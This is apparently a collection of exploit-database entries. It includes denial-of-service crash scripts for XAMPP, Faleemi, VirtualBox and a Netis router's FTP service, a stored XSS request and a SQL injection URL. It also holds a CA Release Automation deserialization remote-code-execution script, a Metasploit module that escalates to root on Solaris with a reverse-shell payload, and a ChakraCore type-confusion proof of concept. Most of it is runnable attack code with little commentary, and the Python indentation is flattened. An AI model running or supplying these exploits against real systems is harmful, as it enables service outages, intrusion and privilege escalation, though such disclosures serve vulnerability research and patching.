# Download: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/7.2.9/xampp-portable-win32-7.2.9-0-VC15-installer.exe/download
# Tested on: Windows 7 32bit
# Steps to Reproduce:
# Run the python exploit script, it will create a new file with the name "exploit.txt".
# Copy the contents of "exploit.txt"
# Start the program and click "Config(Top Right With Symbol)"
# Paste the contents of "exploit.txt" into the following fields:"Editor" & "Browser".
# Click "Save" and then in the main window Click "Config" > "Apache (httpd.conf)".
# You will see a crash!
#!/usr/bin/python
buffer = "A" * 6000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Faleemi Plus 1.0.2 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-09-14
# Software Link: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe
# Tested Version: 1.0.2
# Tested on OS: Windows 10
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the program. Now click "Add Camera" and in the new
# window paste the content of "exploit.txt" into the following fields:
# "Camera name" & "DID number". Click "Add" and you will see a crash.
#!/usr/bin/python
buffer = "A" * 2000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)
# Author: Cakes
# Discovery Date: 2018-09-16
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Home/detail/id/74.html
# Tested Version: RTK 2.1.1
# Tested on OS: Kali Linux
# CVE: N/A
# Description
# The FTP service is vulnerable to a Denial of Service attack. Attackers simply need to log
# into the router and send and valid FTP command with a character offset of 1461 as the command input
import socket
evil = '\x41'*1461
print "\n[*] Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)"
print "\r[i] Creating socket"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\r[i] Connecting..."
connect = s.connect(('192.168.1.1',21))
s.recv(1024)
try:
s.send('USER guest\r\n')
s.recv(1024)
s.send('PASS guest\r\n')
s.recv(1024)
print "\r[+] Connected"
except:
print "\r[!] Credentials aren't working. Please change if none default"
print "\r[+] Sending Payload"
try:
s.send('ABOR %s' % (evil))
print "\r[+] Payload sent"
print "\r[+] Router offline"
except:
print "\r[!] Something went wrong"
s.close()
# Exploit Title: Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting
# Author: Cakes
# Discovery Date: 2018-09-16
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Home/detail/id/74.html
# Tested Version: RTK 2.1.1
# Tested on OS: Kali Linux
# CVE: N/A
# Description:
# Improper input validation on the router web interface allows attackers add a persistent
# Cross-Site scripting attack on the Dynamic DNS hostname field. Simply intercept a renaming
# request and add in the XSS
# Poc
POST /form2Ddns.cgi HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://Target/ddns.htm?v=1537192256000
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
ddnsProv=0&hostname=<script>alert("Cakes");</script>&interface=15&enable=on&username=tester&password=tester&addacc=Add&submit.htm%3Fddns.htm=Send
# Exploit Title: Oracle VirtualBox Manager 5.2.18 r124319 - 'Name Attribute' Denial of Service (PoC)
# Discovery by: Jose Eduardo Castro
# Discovery Date: 2018-09-14
# Vendor Homepage: https://www.virtualbox.org/
# Software Link: https://download.virtualbox.org/virtualbox/5.2.18/VirtualBox-5.2.18-124319-Win.exe
# Tested Version: 5.2.18 r124319
# Tested on OS : Windows 7 Ultimate x64 es
#!/usr/bin/env python
#-*-coding: utf-8-*-
# Steps to Produce the DoS:
# 1.- Run python code : python vb_dos.py
# 2.- Open string.txt and copy content to clipboard
# 3.- Open VM VirtualBox Manager
# 4.- Select a created virtual machine in mode "power off" and select "Settings"
# 5.- Select "Storage" button
# 6.- Select option "Adds new storage controller" and select any controller
# 7.- Paste ClipBoard on "Name"
# 8.- Clic OK
# 9.- DoS
import socket, os, sys
buffer = "\x41" * 5000
f = open ("string.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: CA Release Automation NiMi 6.5 - Remote Command Execution
# Date: 2016-06-23
# Exploit Authors: Jakub Palaczynski, Maciej Grabiec
# Vendor Homepage: http://www.ca.com/
# Software Link: https://docops.ca.com/ca-release-automation/5-5-2/en/installation/deploy-agents/
# Version: CA Release Automation (NiMi) 5.X, 6.3, 6.4, 6.5
# CVE: CVE-2018-15691
# Info: CA Release Automation (NiMi) Remote Command Execution via Deserialization
# Info: Payloads generated using CommonsCollections1 from ysoserial work correctly.
# Info: Proof of Concept exploits NiMi service if security is turned off.
#!/usr/bin/python
import socket
import sys
import struct
if len(sys.argv) < 4:
sys.stderr.write("[-]Usage: python %s <ip> <port> <payload_file> <target_nodeid - not mandatory>\n" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 10.0.0.1 6600 /tmp/payload.bin\n" % sys.argv[0])
exit(1)
host = sys.argv[1]
port = sys.argv[2]
file = sys.argv[3]
# check if payload does not exceed specified value
payloadObj = open(file,'rb').read()
if len(payloadObj) > 5729:
print 'Payload must be less than 5730 bytes. Try another one.'
exit(1)
# open socket to nimi port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting to node.'
sock.connect((host, int(port)))
# say hello to nimi
sock.recv(256)
sock.send('\x00\x00\x00\x0c\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x72\x02\x08\x00') # first required message
# get Node ID
data = sock.recv(256)
name = data[5] + data[6:6+ord(data[5])]
if len(sys.argv) == 5:
name = struct.pack(">B", len(sys.argv[4])) + sys.argv[4]
# check if security is enabled
sock.send('\x00\x00\x00\x1a\x0a\x04\x6e\x6f\x64\x65\x10\x0a\x7a\x10\x0a\x0c\x0a\x07\x30\x2e\x30\x2e\x30\x2e\x30\x10\x94\x3c\x10\x00') # second required message
check = sock.recv(256)
if check == "":
print 'Security is enabled. Sorry.'
exit(1)
# send payload
print 'Sending payload.'
header = '\x0a\x04\x6e\x6f\x64\x65\x10\x01\x1a' + name + '\x2a\xe4\x2c\x0a\xe1\x2c'
stage = header + payloadObj + '\x90' * (5729-len(payloadObj))
payload = struct.pack(">I", len(stage)) + stage
sock.sendall(payload)
sock.close()
# Title: Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection
# Date: 2018-09-14
# Exploit Author: Hamza Megahed
# Vendor Homepage:https://www.joomla.org/
# Download: https://arkextensions.com/products/jck-editor
# Version: 6.4.4
# Tested on: Ubuntu, FireFox,
# CVE: N/A
# Parameter = parent
# Payload = " UNION SELECT NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL -- aa
# Poc:
Test = [HOST]/[PATH]/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Solaris::Priv
include Msf::Post::Solaris::System
include Msf::Post::Solaris::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',
'Description' => %q{
This module exploits an arbitrary file write vulnerability in the
Netscape Portable Runtime library (libnspr) on unpatched Solaris systems
prior to Solaris 10u3 which allows users to gain root privileges.
libnspr versions prior to 4.6.3 allow users to specify a log file with
the `NSPR_LOG_FILE` environment variable. The log file is created with
the privileges of the running process, resulting in privilege escalation
when used in combination with a SUID executable.
This module writes a shared object to the trusted library directory
`/usr/lib/secure` and runs the specified SUID binary with the shared
object loaded using the `LD_LIBRARY_PATH` environment variable.
This module has been tested successfully with libnspr version 4.5.1
on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).
},
'References' =>
[
['BID', '20471'],
['CVE', '2006-4842'],
['EDB', '2543'],
['EDB', '2569'],
['EDB', '2641'],
['URL', 'https://securitytracker.com/id/1017050'],
['URL', 'https://securitytracker.com/id/1017051'],
['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],
['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],
['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']
],
'License' => MSF_LICENSE,
'Author' =>
[
'iDefense', # Discovery
'Marco Ivaldi', # Exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Oct 11 2006',
'Privileged' => true,
'Platform' => ['solaris'],
'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],
'Targets' => [['Auto', {}]],
'SessionTypes' => ['shell', 'meterpreter'],
'DefaultOptions' =>
{
'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
# Some useful example SUID executables:
# * /usr/bin/cancel
# * /usr/bin/chkey
# * /usr/bin/lp
# * /usr/bin/lpset
# * /usr/bin/lpstat
# * /usr/lib/lp/bin/netpr
# * /usr/sbin/lpmove
OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def suid_bin_path
datastore['SUID_PATH']
end
def is_writable?(path)
cmd_exec("[ -w #{path} ] && echo true").include? 'true'
end
def mkdir(path)
vprint_status "Creating directory '#{path}'"
cmd_exec "mkdir -p '#{path}'"
register_dir_for_cleanup path
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_compile(path, data)
upload "#{path}.c", data
output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
register_file_for_cleanup path
end
def check
unless setuid? suid_bin_path
vprint_error "#{suid_bin_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{suid_bin_path} is setuid"
unless has_gcc?
vprint_error 'gcc is not installed'
return CheckCode::Safe
end
vprint_good 'gcc is installed'
# libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable
# Earlier versions may also be vulnerable
libnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr'
libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\s+([\d\.]+),/).flatten.first
if libnspr_pkg_version.to_s.eql? ''
vprint_error 'Could not determine libnspr version'
return CheckCode::Unknown
end
if Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3')
vprint_error "libnspr version #{libnspr_pkg_version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "libnspr version #{libnspr_pkg_version} appears to be vulnerable"
# Solaris 10 versions prior to the 2006 patches are known to be vulnerable.
# Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default,
# however third-party software may also introduce a vulnerable version of the library.
version = kernel_release
if version.to_s.eql? ''
vprint_error 'Could not determine Solaris version'
return CheckCode::Detected
end
unless Gem::Version.new(version) <= Gem::Version.new('5.10')
vprint_error "Solaris version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Solaris version #{version} appears to be vulnerable"
# The vulnerability was patched in various Solaris patches for different platforms.
# For more information, see:
# - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1
installed_patches = cmd_exec 'showrev -p'
[
119214, # Solaris 10 (x86) patch 119214-10
119213, # Solaris 10 (SPARC) patch 119213-10
119212, # Solaris 9 (x86) patch 119212-10
119211, # Solaris 9 (SPARC) patch 119211-10
119209 # Solaris 8 (SPARC) patch 119209-10
].each do |patch|
if installed_patches =~ / #{patch}-(\d+)/
revision = $1.to_i
if revision >= 10
vprint_error "Solaris patch #{patch}-#{revision} has been applied"
return CheckCode::Safe
end
end
end
vprint_good 'Solaris patches are not installed'
CheckCode::Appears
end
def exploit
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless [CheckCode::Detected, CheckCode::Appears].include? check
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
unless is_writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end
# Create writable file in /usr/lib/secure
lib_path = '/usr/lib/secure'
lib_name = 'libldap.so.5'
vprint_status "Creating file #{lib_path}/#{lib_name}"
cmd_exec 'umask 0'
cmd_exec "NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\"#{lib_path}/#{lib_name}\" #{suid_bin_path}"
cmd_exec "NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}"
cmd_exec 'umask 022'
unless is_writable? "#{lib_path}/#{lib_name}"
fail_with Failure::Unknown, "Could not create file '#{lib_path}/#{lib_name}'"
end
print_good "Created file #{lib_path}/#{lib_name}"
register_file_for_cleanup "#{lib_path}/#{lib_name}"
# Upload and compile shared object
base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
mkdir base_path
payload_name = ".#{rand_text_alphanumeric 5..10}"
payload_path = "#{base_path}/#{payload_name}"
so = <<-EOF
void __attribute__((constructor)) cons() {
setuid(0);
setgid(0);
execle("#{payload_path}", "", 0, 0);
_exit(0);
}
EOF
so_name = ".#{rand_text_alphanumeric 5..10}"
so_path = "#{base_path}/#{so_name}"
upload_and_compile so_path, so
vprint_status "Writing shared object #{lib_path}/#{lib_name}"
cmd_exec "cp '#{so_path}' '#{lib_path}/#{lib_name}'"
register_file_for_cleanup "#{lib_path}/#{lib_name}"
# Upload and execute payload
upload payload_path, generate_payload_exe
cmd_exec "chmod +x #{payload_path}"
print_status 'Executing payload...'
cmd_exec "LD_LIBRARY_PATH=\"#{lib_path}\" #{suid_bin_path} & echo "
end
end
/*
Here's a snippet of PathTypeHandlerBase::SetAttributesHelper.
PathTypeHandlerBase *predTypeHandler = this;
DynamicType *currentType = instance->GetDynamicType();
while (predTypeHandler->GetPathLength() > propertyIndex)
{
currentType = predTypeHandler->GetPredecessorType();
if (currentType == nullptr)
{
#ifdef PROFILE_TYPES
instance->GetScriptContext()->convertPathToDictionaryNoRootCount++;
#endif
// This can happen if object header inlining is deoptimized, and we haven't built a full path from the root.
// For now, just punt this case.
return TryConvertToSimpleDictionaryType(instance, GetPathLength())->SetAttributes(instance, propertyId, ObjectSlotAttributesToPropertyAttributes(propertyAttributes));
}
predTypeHandler = PathTypeHandlerBase::FromTypeHandler(currentType->GetTypeHandler());
}
When object header inlining is deoptimized, the type handler of the object is converted to a dictionary type handler. The problem is that it doesn't consider some attributes that dictionary type handlers don't have, so adding or removing those attributes can fail. ObjectSlotAttr_Accessor which indicates that the property is an accessor is one of them.
Here's a snippet of PathTypeHandlerBase::SetPropertyInternal.
else if (isInit)
{
ObjectSlotAttributes * attributes = this->GetAttributeArray();
if (attributes && (attributes[index] & ObjectSlotAttr_Accessor))
{
this->SetAttributesHelper(instance, propertyId, index, attributes, (ObjectSlotAttributes)(attributes[index] & ~ObjectSlotAttr_Accessor), true);
// We're changing an accessor into a data property at object init time. Don't cache this transition from setter to non-setter,
// as it behaves differently from a normal set property.
PropertyValueInfo::SetNoCache(info, instance);
newTypeHandler = PathTypeHandlerBase::FromTypeHandler(instance->GetDynamicType()->GetTypeHandler());
newTypeHandler->SetSlotUnchecked(instance, index, value);
return true;
}
}
We can use the bug to make removing ObjectSlotAttr_Accessor fail. As a result, a data value can be used as an accessor.
PoC:
*/
let o = {
get a() {},
0: 0, // Deoptimizing object header inlining
a: 0x1234
};
o.a; // Type confusion